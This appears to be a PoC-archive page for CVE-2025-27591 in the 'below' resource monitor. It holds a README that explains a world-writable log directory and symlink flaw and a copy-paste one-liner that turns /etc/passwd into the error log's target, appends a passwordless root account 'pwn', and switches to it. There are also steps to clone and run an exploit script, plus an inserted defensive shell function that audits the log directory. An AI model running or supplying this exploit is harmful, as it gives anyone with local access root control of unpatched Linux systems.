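PoC details: 1b79049cdaf3701c2fd1fe6085bf0c6c67f195d3

Source
Related vulnerability
Title: below security vulnerability (CVE-2025-27591)
Description: below is a resource monitor for modern Linux systems, open-sourced by Meta Incubator. Versions of below before v0.9.0 contain a security vulnerability that stems from the creation of a world-writable directory and may allow escalation to root privileges through a symlink attack.
Description
Below v0.8.1 - Local Privilege Escalation (CVE-2025-27591) - PoC Exploit
Introduction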
# Below - Local Privilege Escalation (CVE-2025-27591)

<br><br>
<div align="center">
  <img width="250" src="https://raw.githubusercontent.com/facebookincubator/below/main/img/below_logo_horizontal.png" alt="below-logo"> <br><br>
  <p>Below <= v0.8.1<br>
  <b>Local Privilege Escalation via World-Writable Log Symlink</b> <br>
    PoC Exploit<br>
  </p>
  <br><br>
  <img src="https://www.zyenra.com/assets/img/below-pe.png">
</div>



---

### Introduction

`Below` versions <= 0.8.1 contain a critical local privilege escalation vulnerability (CVE-2025-27591).  
Due to a misconfigured world-writable log directory (`/var/log/below/`) and insecure permission logic in the Rust codebase, a local attacker can replace `error_<user>.log` with a symlink to any root-owned file, such as `/etc/passwd`.  

When `below snapshot` is executed with `sudo`, it forcibly sets mode `0666` on the log file and writes to it—even if it's a symlink.  
This allows injection of a `root`-privileged user without a password, leading to full root shell access.
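
An added defensive check, not part of the PoC repository or the below project: the function flags the on-disk conditions described above (a world-writable log directory, a symlinked `error_<user>.log`, and an error log left world-writable). The name `audit_below_logdir` and the `FINDING:` output format are assumptions of this example; it relies on `find` and `readlink` as shipped on typical Linux systems.

```bash
#!/bin/sh
# Added example, not from the PoC repository: audit a below log directory for
# the conditions CVE-2025-27591 depends on. Names and output format are made up.

# Usage: audit_below_logdir [DIR]   (DIR defaults to /var/log/below)
# Prints one line per finding; exit status 1 if anything was found, 0 if clean.
audit_below_logdir() (
    dir=${1:-/var/log/below}
    rc=0

    [ -d "$dir" ] || { echo "SKIP: $dir is not a directory"; exit 0; }

    # 1. World-writable directory: any local user can create or replace entries.
    #    "$dir/." makes find inspect the directory itself, even via a symlink.
    if [ -n "$(find "$dir/." -maxdepth 0 -perm -0002)" ]; then
        echo "FINDING: directory $dir is world-writable"
        rc=1
    fi

    for f in "$dir"/error_*.log; do
        # An unmatched glob stays literal; skip it (dangling symlinks still pass -L).
        [ -e "$f" ] || [ -L "$f" ] || continue

        if [ -L "$f" ]; then
            # 2. A symlinked error log redirects the privileged chmod and write.
            echo "FINDING: $f is a symlink -> $(readlink "$f")"
            rc=1
        elif [ -n "$(find "$f" -maxdepth 0 -type f -perm -0002)" ]; then
            # 3. World-writable log file, e.g. mode 0666 from an earlier run.
            echo "FINDING: $f is a world-writable file"
            rc=1
        fi
    done

    exit "$rc"
)
```

Source the file and call `audit_below_logdir` with no argument to check `/var/log/below`; a non-zero status means at least one condition is present.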

---

### Usage

```bash
git clone https://github.com/rvizx/CVE-2025-27591
cd CVE-2025-27591
chmod +x exploit.sh
./exploit.sh
```

**OR**

One-liner - (Copy, paste and execute)

```bash
u=$(id -un); rm -f /var/log/below/error_"$u".log; ln -s /etc/passwd /var/log/below/error_"$u".log; export LOGS_DIRECTORY=/var/log/below; sudo /usr/bin/below snapshot --begin now 2>/dev/null || true; echo 'pwn::0:0:root:/root:/bin/bash' >> /etc/passwd; su pwn
```

---

### Environment

* Below <= v0.8.1
* Systemd-managed Linux (Ubuntu, Arch, Fedora, etc.)
* User in `sudo` group with `NOPASSWD` access to `/usr/bin/below *`

---

### Credits

Discovered and reported by Matthias Gerstner @ SUSE - [Security Advisory](https://security.opensuse.org/2025/03/12/below-world-writable-log-dir.html) <br>
PoC Exploit - Ravindu Wickramasinhge AKA [rvz](https://github.com/rvizx)
File snapshot

[4.0K] /data/pocs/1b79049cdaf3701c2fd1fe6085bf0c6c67f195d3
├── [ 413] exploit.sh
└── [1.8K] README.md

0 directories, 2 files